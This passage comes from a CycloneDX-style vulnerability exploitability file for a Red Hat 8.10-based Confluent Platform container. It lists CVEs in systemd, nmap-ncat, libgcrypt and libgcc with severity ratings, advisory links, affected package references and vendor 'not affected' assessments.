          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2018-25282",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        674
      ],
      "description": "Nmap 7.70 contains a denial of service vulnerability that allows local attackers to crash the application by processing malicious XML files with exponential entity expansion. Attackers can create a crafted XML file with nested entity definitions and open it through ZenMap's scan import functionality to cause the program to consume excessive system resources and crash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-25282"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-25282"
        },
        {
          "url": "https://nmap.org/dist/nmap-7.70-setup.exe"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25282"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-25282"
        },
        {
          "url": "https://www.exploit-db.com/exploits/45357"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nmap-denial-of-service-via-xml-entity-expansion"
        }
      ],
      "published": "2026-04-26T22:17:28+00:00",
      "updated": "2026-06-17T01:55:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:7.92-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2019-12904",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        668
      ],
      "description": "In Libgcrypt 1.8.4, the C implementation of AES is vulnerable to a flush-and-reload side-channel attack because physical addresses are available to other processes. (The C implementation is used on platforms where an assembly-language implementation is unavailable.) NOTE: the vendor's position is that the issue report cannot be validated because there is no description of an attack",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-12904"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00049.html"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-12904"
        },
        {
          "url": "https://dev.gnupg.org/T4541"
        },
        {
          "url": "https://github.com/gpg/libgcrypt/commit/a4c561aab1014c3630bc88faf6f5246fee16b020"
        },
        {
          "url": "https://github.com/gpg/libgcrypt/commit/daedbbb5541cd8ecda1459d3b843ea4d92788762"
        },
        {
          "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gcrypt-devel/2019-July/004760.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12904"
        },
        {
          "url": "https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-12904.html"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-12904"
        }
      ],
      "published": "2019-06-20T00:15:10+00:00",
      "updated": "2026-06-17T02:15:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.8.5-7.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2019-14250",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190,
        787
      ],
      "description": "An issue was discovered in GNU libiberty, as distributed in GNU Binutils 2.32. simple_object_elf_match in simple-object-elf.c does not check for a zero shstrndx value, leading to an integer overflow and resultant heap-based buffer overflow.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-14250"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00078.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00004.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/109354"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-14250"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=90924"
        },
        {
          "url": "https://gcc.gnu.org/ml/gcc-patches/2019-07/msg01003.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14250"
        },
        {
          "url": "https://security.gentoo.org/glsa/202007-39"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20190822-0002/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4326-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4336-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4336-2"
        },
        {
          "url": "https://usn.ubuntu.com/4326-1/"
        },
        {
          "url": "https://usn.ubuntu.com/4336-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-14250"
        }
      ],
      "published": "2019-07-24T04:15:12+00:00",
      "updated": "2026-06-17T02:18:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2019-16866",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
